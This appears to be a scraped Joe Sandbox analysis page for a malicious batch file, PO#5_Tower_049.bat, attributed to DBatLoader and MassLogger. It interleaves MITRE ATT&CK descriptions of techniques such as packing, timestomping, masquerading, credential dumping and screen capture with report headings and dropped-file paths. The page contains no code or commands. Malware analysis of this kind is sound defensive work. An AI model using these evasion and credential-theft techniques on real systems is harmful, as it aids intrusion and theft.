Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO#5_Tower_049.bat

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DBatLoader

Threatname: MassLogger

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Libraries\FX.cmd

C:\Users\Public\Libraries\NEO.cmd

C:\Users\Public\Libraries\Oupzhkpr

C:\Users\Public\Libraries\Oupzhkpr.PIF

C:\Users\Public\Libraries\rpkhzpuO.pif

C:\Users\Public\Oupzhkpr.url

C:\Users\Public\OupzhkprF.cmd

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rpkhzpuO.pif.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Windows Analysis Report
PO#5_Tower_049.bat

Description:	Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre